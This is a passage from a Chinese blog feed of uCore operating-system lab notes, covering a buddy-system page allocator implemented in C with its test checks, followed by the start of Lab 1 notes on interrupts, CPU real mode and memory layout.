class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="b-初始化">b. 
初始化</h5><p>初始时，程序会多次将一块尺寸很大的物理内存空间传入<code>init_memmap</code>函数，但该物理内存空间的大小却不一定是2的n次幂，所以需要对其进行分割。设定分割后的内存布局如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">buddy system中的内存布局</span></span><br><span class="line"><span class="comment">      某块较大的物理空间</span></span><br><span class="line"><span class="comment">低地址                              高地址</span></span><br><span class="line"><span class="comment">+-+--+----+--------+-------------------+</span></span><br><span class="line"><span class="comment">| |  |    |        |                   |</span></span><br><span class="line"><span class="comment">+-+--+----+--------+-------------------+</span></span><br><span class="line"><span class="comment">低地址的内存块较小             高地址的内存块较大</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>同时，在双向链表<code>free_area.free_list</code>中，令空间较小的内存块在双向链表中靠前，空间较大的内存块在双向链表中靠后；低地址在前，高地址在后。故以下是最终的链表布局：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">Block order in free_area.free_list:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">1. Block order after one large contiguous physical region is split</span></span><br><span class="line"><span class="comment">    addr: 0x34       0x38           0x40</span></span><br><span class="line"><span class="comment">        +----+     +--------+     +---------------+</span></span><br><span class="line"><span class="comment">    &lt;-&gt; | 0x4| &lt;-&gt; | 0x8    | &lt;-&gt; |     0x10      | &lt;-&gt;</span></span><br><span class="line"><span class="comment">        +----+     +--------+     +---------------+</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">2. Block order after several large physical regions (possibly non-contiguous) are split</span></span><br><span class="line"><span class="comment">    addr: 0x34       0x104       0x38           0x108          0x40                 0x110</span></span><br><span class="line"><span class="comment">        +----+     +----+     +--------+     +--------+     +---------------+     +---------------+</span></span><br><span class="line"><span class="comment">    &lt;-&gt; | 0x4| &lt;-&gt; | 0x4| &lt;-&gt; | 0x8    | &lt;-&gt; | 0x8    | &lt;-&gt; |     0x10      | &lt;-&gt; |     0x10      | &lt;-&gt;</span></span><br><span class="line"><span class="comment">        +----+     +----+     +--------+     +--------+     +---------------+     +---------------+</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>Following the layout above, <code>buddy_init_memmap</code> can be written as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">buddy_init_memmap</span><span class="params">(<span class="keyword">struct</span> Page *base, <span class="type">size_t</span> n)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 设置当前页向后的curr_n个页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *p = base;</span><br><span class="line">    <span class="keyword">for</span> (; p != base + n; p ++) &#123;</span><br><span class="line">        <span 
class="built_in">assert</span>(<span class="built_in">PageReserved</span>(p));</span><br><span class="line">        p-&gt;flags = p-&gt;property = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">set_page_ref</span>(p, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Update the total number of free pages</span></span><br><span class="line">    nr_free += n;</span><br><span class="line">    <span class="comment">// Point base at the end of the memory that has not been processed yet</span></span><br><span class="line">    base += n;</span><br><span class="line">    <span class="keyword">while</span>(n != <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">size_t</span> curr_n = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">        <span class="comment">// Step back by one block</span></span><br><span class="line">        base -= curr_n;</span><br><span class="line">        <span class="comment">// Record the number of free pages in this block</span></span><br><span class="line">        base-&gt;property = curr_n;</span><br><span class="line">        <span class="comment">// Mark the head page of the block as free</span></span><br><span class="line">        <span class="built_in">SetPageProperty</span>(base);</span><br><span class="line">        <span class="comment">// Insert the free block by size, in ascending order</span></span><br><span class="line">        <span class="comment">// @note The insert position must be searched for instead of calling list_add_after(&amp;free_list) directly, because large blocks are not always adjacent</span></span><br><span class="line">        <span class="type">list_entry_t</span>* le;</span><br><span class="line">        <span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span 
class="built_in">le2page</span>(le, page_link);</span><br><span class="line">            <span class="comment">// Sort by block size first, then by address.</span></span><br><span class="line">            <span class="keyword">if</span>((p-&gt;property &gt; base-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &gt; base))</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br><span class="line">        n -= curr_n;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="c-空间分配">c. Allocation</h5><p>To allocate, walk the doubly linked list and look for a block of a suitable size.</p><ul><li><p>If no block of exactly the required size exists, take the first block encountered that is larger than required and <strong>split it in half</strong>.</p></li><li><p>If the two halves are still too large, keep splitting the <strong>first</strong> (lower-address) half.</p></li><li><p>Repeat until a block of the required size has been carved out.</p></li><li><p>The final <code>buddy_alloc_pages</code> code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">Page</span> *</span><br><span class="line"><span class="built_in">buddy_alloc_pages</span>(<span class="type">size_t</span> n) &#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 向上取2的幂次方，如果当前数为2的幂次方则不变</span></span><br><span class="line">    <span class="type">size_t</span> lessOfPower2 = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">    <span class="keyword">if</span> (lessOfPower2 &lt; n)</span><br><span class="line">        n = <span class="number">2</span> * lessOfPower2;</span><br><span class="line">    <span class="comment">// 如果待分配的空闲页面数量小于所需的内存数量</span></span><br><span class="line">    <span class="keyword">if</span> (n &gt; nr_free) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 查找符合要求的连续页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="type">list_entry_t</span> *le = &amp;free_list;</span><br><span class="line">    <span class="keyword">while</span> ((le = <span class="built_in">list_next</span>(le)) != &amp;free_list) 
&#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="keyword">if</span> (p-&gt;property &gt;= n) &#123;</span><br><span class="line">            page = p;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果需要切割内存块时，一定分配切割后的前面那块</span></span><br><span class="line">    <span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// 如果内存块过大，则持续切割内存</span></span><br><span class="line">        <span class="keyword">while</span>(page-&gt;property &gt; n)</span><br><span class="line">        &#123;</span><br><span class="line">            page-&gt;property /= <span class="number">2</span>;</span><br><span class="line">            <span class="comment">// 切割出的右边那一半内存块不用于内存分配</span></span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + page-&gt;property;</span><br><span class="line">            p-&gt;property = page-&gt;property;</span><br><span class="line">            <span class="built_in">SetPageProperty</span>(p);</span><br><span class="line">            <span class="built_in">list_add_after</span>(&amp;(page-&gt;page_link), &amp;(p-&gt;page_link));</span><br><span class="line">        &#125;</span><br><span class="line">        nr_free -= n;</span><br><span class="line">        <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">        <span class="built_in">assert</span>(page-&gt;property == n);</span><br><span class="line">        <span class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    
&#125;</span><br><span class="line">    <span class="keyword">return</span> page;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="d-内存释放">d. Freeing memory</h5><p>When a block is freed:</p><ul><li><p>First insert the block into the doubly linked list, ordered <strong>by block size (ascending) and then by block address (ascending)</strong>; see the list layout above.</p></li><li><p>Try to merge with the preceding block. One attempt is enough: after a successful backward merge, the block can never merge backward again.</p></li><li><p>Then keep merging forward in a loop until no further merge is possible.</p><blockquote><p>Note that once the current block has been merged, its size doubles. When looking for the next merge candidate, the search therefore has to continue into blocks larger than the original (pre-merge) size.</p></blockquote></li><li><p>Check whether the current block is still at the right position in the list. If it is not, unlink it and reinsert it at the correct position.</p><blockquote><p>A block that was never merged is always in the right position. A block that was merged is <strong>not necessarily misplaced</strong>.</p></blockquote></li><li><p>The final code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">buddy_free_pages</span><span class="params">(<span class="keyword">struct</span> Page *base, <span class="type">size_t</span> n)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 向上取2的幂次方，如果当前数为2的幂次方则不变</span></span><br><span class="line">    <span class="type">size_t</span> lessOfPower2 = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">    <span class="keyword">if</span> (lessOfPower2 &lt; n)</span><br><span class="line">        n = <span class="number">2</span> * lessOfPower2;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title 
class_">Page</span> *p = base;</span><br><span class="line">    <span class="keyword">for</span> (; p != base + n; p ++) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(!<span class="built_in">PageReserved</span>(p) &amp;&amp; !<span class="built_in">PageProperty</span>(p));</span><br><span class="line">        p-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">set_page_ref</span>(p, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    base-&gt;property = n;</span><br><span class="line">    <span class="built_in">SetPageProperty</span>(base);</span><br><span class="line">    nr_free += n;</span><br><span class="line">    <span class="type">list_entry_t</span> *le;</span><br><span class="line">    <span class="comment">// First insert the block into the list</span></span><br><span class="line">    <span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">    &#123;</span><br><span class="line">        p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="keyword">if</span> ((base-&gt;property &lt;= p-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &gt; base)) &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br><span class="line">    <span class="comment">// Try to merge with the lower-address (left) neighbor first</span></span><br><span class="line">    <span class="keyword">if</span>(base-&gt;property == p-&gt;property &amp;&amp; p + p-&gt;property == base) &#123;</span><br><span class="line">        p-&gt;property += 
base-&gt;property;</span><br><span class="line">        <span class="built_in">ClearPageProperty</span>(base);</span><br><span class="line">        <span class="built_in">list_del</span>(&amp;(base-&gt;page_link));</span><br><span class="line">        base = p;</span><br><span class="line">        le = &amp;(base-&gt;page_link);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Then keep merging with the following blocks in a loop</span></span><br><span class="line">    <span class="comment">// At this point le points to the block after the inserted one</span></span><br><span class="line">    <span class="keyword">while</span> (le != &amp;free_list) &#123;</span><br><span class="line">        p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="comment">// Merge if possible (same size and adjacent addresses)</span></span><br><span class="line">        <span class="comment">// Two blocks of the same size are not necessarily adjacent in memory.</span></span><br><span class="line">        <span class="comment">// In other words, one list may hold several equal-sized blocks that cannot be merged</span></span><br><span class="line">        <span class="keyword">if</span> (base-&gt;property == p-&gt;property &amp;&amp; base + base-&gt;property == p)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// Merge with the right neighbor</span></span><br><span class="line">            base-&gt;property += p-&gt;property;</span><br><span class="line">            <span class="built_in">ClearPageProperty</span>(p);</span><br><span class="line">            <span class="built_in">list_del</span>(&amp;(p-&gt;page_link));</span><br><span class="line">            le = &amp;(base-&gt;page_link);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Stop once we reach a block that can never be merged (it is larger than base)</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(base-&gt;property &lt; p-&gt;property)</span><br><span class="line">        &#123;</span><br><span class="line">  
          <span class="comment">// No more merges are possible: fix the position of base so that blocks stay sorted by size, then by address</span></span><br><span class="line">            <span class="type">list_entry_t</span>* targetLe = <span class="built_in">list_next</span>(&amp;base-&gt;page_link);</span><br><span class="line">            p = <span class="built_in">le2page</span>(targetLe, page_link);</span><br><span class="line">            <span class="keyword">while</span>((p-&gt;property &lt; base-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &lt; base))</span><br><span class="line">                p = <span class="built_in">le2page</span>(targetLe = <span class="built_in">list_next</span>(targetLe), page_link);</span><br><span class="line">            <span class="comment">// If the current block is in the wrong position, move it</span></span><br><span class="line">            <span class="keyword">if</span>(targetLe != <span class="built_in">list_next</span>(&amp;base-&gt;page_link))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">list_del</span>(&amp;(base-&gt;page_link));</span><br><span class="line">                <span class="built_in">list_add_before</span>(targetLe, &amp;(base-&gt;page_link));</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Done</span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        le = <span class="built_in">list_next</span>(le);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="5-算法检查">5. 
Checking the algorithm</h5><p><code>buddy_check</code> is a check function that should not be skipped, since it helps expose bugs hidden inside the allocator. I replaced the part that originally checked the <code>FIFO</code> algorithm with checks for <code>buddySystem</code>. The modified part is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.........................................................</span></span><br><span class="line"><span class="comment">// Free first</span></span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">26</span>);     <span class="comment">// 32+  (-: allocated, +: free)</span></span><br><span class="line"><span class="comment">// 
首先检查是否对齐2</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">6</span>);    <span class="comment">// 8- 8+ 16+</span></span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">10</span>);   <span class="comment">// 8- 8+ 16-</span></span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">10</span>);     <span class="comment">// 8- 8+ 16+</span></span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">assert</span>(p1-&gt;property == <span class="number">16</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);   <span class="comment">// 8- 8+ 16-</span></span><br><span class="line"><span class="comment">// 之后检查合并</span></span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">6</span>);      <span class="comment">// 16+ 16-</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);     <span class="comment">// 32+</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">8</span>);    <span class="comment">// 8- 8+ 16+</span></span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">9</span>);    <span class="comment">// 8- 8+ 
16-</span></span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">9</span>);     <span class="comment">// 8- 8+ 16+</span></span><br><span class="line"><span class="built_in">assert</span>(p1-&gt;property == <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>((p0 + <span class="number">8</span>)-&gt;property == <span class="number">8</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">8</span>);      <span class="comment">// 32+</span></span><br><span class="line"><span class="built_in">assert</span>(p0-&gt;property == <span class="number">32</span>);</span><br><span class="line"><span class="comment">// 检测链表顺序是否按照块的大小排序的</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">5</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;((p1 - <span class="number">8</span>)-&gt;page_link));</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">5</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">5</span>);</span><br><span class="line">p1 = <span class="built_in">alloc_pages</span>(<span class="number">16</span>);</span><br><span class="line"><span class="built_in">free_pages</span>(p0, <span class="number">5</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span 
class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"><span class="built_in">free_pages</span>(p1, <span class="number">16</span>);</span><br><span class="line"><span class="built_in">assert</span>(<span class="built_in">list_next</span>(&amp;(free_list)) == &amp;(p0-&gt;page_link));</span><br><span class="line"></span><br><span class="line"><span class="comment">// Restore the initial state</span></span><br><span class="line">p0 = <span class="built_in">alloc_pages</span>(<span class="number">26</span>);</span><br><span class="line"><span class="comment">//.........................................................</span></span><br></pre></td></tr></table></figure><h5 id="6-总结与完整代码">6. Summary and complete code</h5><ul><li><p><code>buddySystem</code> works best when <strong>every allocation size is a power of 2</strong>.</p></li><li><p>Given how <code>buddySystem</code> works, it is better to manage blocks with a binary tree than with a plain doubly linked list; this avoids a whole class of bugs.</p><p>A plain doubly linked list can implement <code>buddySystem</code>, but one awkward problem remains:</p><blockquote><p><strong>When a physical block is freed and inserted into the list, and it could merge with either the previous block or the next block, which one should it merge with?</strong></p></blockquote><p>A doubly linked list has no good answer to this. A wrong merge order can leave some blocks unmergeable, which fragments memory and lowers utilization.</p></li><li><p>The complete code is on <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/uCore/os_kernel_lab-master_RAW/labcodes/lab2/kern/mm/buddySystem_pmm.c">GitHub</a>; feel free to use it.</p></li></ul><h4 id="Challenge2">Challenge2</h4><blockquote><p><strong>A slub allocator for memory units of arbitrary size</strong></p><p>The slub algorithm allocates memory units efficiently with a two-layer design: the first layer allocates memory in page-sized units, and the second layer builds on it to allocate units of arbitrary size. A simplified implementation that captures the main idea is sufficient.</p></blockquote><blockquote><p>Challenge2 is postponed for now; I need to catch up on the schedule QWQ</p></blockquote>]]></content>
    
    
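    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are the notes I took while working through &lt;code&gt;uCore&lt;/code&gt; Lab 2.&lt;/li&gt;
&lt;li&gt;They cover segment-page memory management, the paging mechanism, and the structure of the uCore page directory and page tables.&lt;/li&gt;
&lt;li&gt;The post is long, so the navigation bar on the right is recommended.&lt;/li&gt;
&lt;/ul&gt;</summary>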
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab1</title>
    <link href="https://kiprey.github.io/2020/08/uCore-1/"/>
    <id>https://kiprey.github.io/2020/08/uCore-1/</id>
    <published>2020-08-04T12:16:04.000Z</published>
    <updated>2025-11-24T03:59:40.142Z</updated>
    
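    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are the notes I took while working through uCore Lab 1.</li><li>They cover CPU real mode, interrupt handling, and privilege-level switching.</li><li>The post is long, so the navigation bar on the right is recommended.</li></ul><span id="more"></span><h2 id="知识点">Key points</h2><h3 id="1-环境配置">1. Environment setup</h3><ul><li>Run <code>sudo apt-get install qemu-system</code> to install qemu, which is needed to run uCore.</li><li>Download the uCore code from the <strong>master</strong> branch of this <a href="https://github.com/chyyuu/os_kernel_lab">github</a> repository (note that master is not the default branch), then unpack it.</li></ul><h3 id="2-BIOS中断、DOS中断、Linux中断的区别">2. Differences between BIOS, DOS, and Linux interrupts</h3><ul><li>BIOS and DOS both live in real mode. The interrupt calls they set up are registered in the Interrupt Vector Table (IVT) and are invoked with the software interrupt instruction <code>int</code> followed by the interrupt number.</li><li>BIOS interrupt calls mainly provide a way to access hardware, which makes hardware operations simple.</li><li>DOS runs in real mode, so its interrupt calls are also registered in the IVT; its vector numbers just must not conflict with those used by the BIOS.</li><li>The Linux kernel sets up its interrupt routines only after entering protected mode. In protected mode the IVT no longer exists and is replaced by the Interrupt Descriptor Table (IDT). Linux system calls resemble DOS interrupt calls, except that Linux enters a single interrupt routine through <code>int 0x80</code> and then dispatches to a sub-function according to the value in the eax register.</li></ul><h3 id="3-操作系统如何识别文件系统">3. How the operating system identifies a file system</h3><ul><li>Every partition has a superblock, usually located in the second sector of the partition. The superblock records information about the partition, including the file system magic number. Each file system has its own magic number, so comparing it reveals the file system type.</li></ul><h3 id="4-CPU的实模式（重要）">4. CPU real mode (important)</h3><ul><li><p>A CPU can be roughly divided into a control unit, an arithmetic unit, and a storage unit.</p><ul><li>The control unit is the control center of the CPU. It roughly consists of the Instruction Register (IR), the Instruction Decoder (ID), and the Operation Controller (OC). The general instruction format is shown below.<br><img src="/2020/08/uCore-1/ia32Inst.png" alt="img"></li><li>The arithmetic unit performs computations according to signals from the control unit.</li><li>The storage unit consists of the L1 and L2 caches and the registers inside the CPU. These caches are built from SRAM. SRAM keeps its data without a refresh circuit, but its cells are larger, so its density is lower.</li></ul></li><li><p>CPU registers fall into two groups: registers visible to programs (such as general-purpose registers and segment registers) and registers invisible to programs (such as the interrupt descriptor table register IDTR).<br><img src="/2020/08/uCore-1/commonRegister.png" alt="img"></p></li><li><p>The defining property of real mode is that <strong>every address a program uses is a real physical address</strong>. In addition, the address space in real mode is only 1MB (20 bits).</p><blockquote><p>On every CPU since the Intel 80386, the address space is limited to 1MB whenever the CPU is in real mode.</p></blockquote></li><li><p>In real mode an address is computed as <strong>16 * segment register value + offset within the segment</strong>. The CPU addressing modes are:</p><ul><li>Register addressing</li><li>Immediate addressing</li><li>Memory addressing<ul><li>Direct addressing, for example <code>mov ax, [0x1234]</code></li><li>Base addressing</li><li>Index addressing</li><li>Base-index addressing</li></ul></li></ul></li></ul><h4 id="a-CPU实模式下的1MB内存">a. 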
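The 1MB of memory in CPU real mode</h4><ul><li><p>The CPU starts in 16-bit real mode, where it can address only 1MB (20 bits) of memory. Hardware engineers divide this 1MB address space into several regions.<br><img src="/2020/08/uCore-1/memmap.png" alt="img"></p></li><li><p>The 640KB at addresses <code>0-0x9ffff</code> is DRAM, that is, the memory modules plugged into the motherboard.<br>The 64KB at the top, <code>0xf0000-0xfffff</code>, is ROM and holds the BIOS code.</p><blockquote><p>The BIOS detects and initializes the hardware, builds the interrupt vector table, and makes sure basic hardware I/O operations work.</p></blockquote></li><li><p>From the CPU's point of view, the physical memory plugged into the motherboard is not "all of the memory". The width of the address bus determines how much address space can be accessed.<br>The memory modules on the motherboard are not the only devices accessed through the address bus; some peripherals are accessed through it as well.<br>Part of the address space is therefore reserved for these peripherals in advance, and the remaining addresses are mapped to DRAM.</p></li></ul><h3 id="5-CPU的分段机制（重要）">5. CPU segmentation (important)</h3><h4 id="a-内存访问为什么要分段">a. Why memory access is 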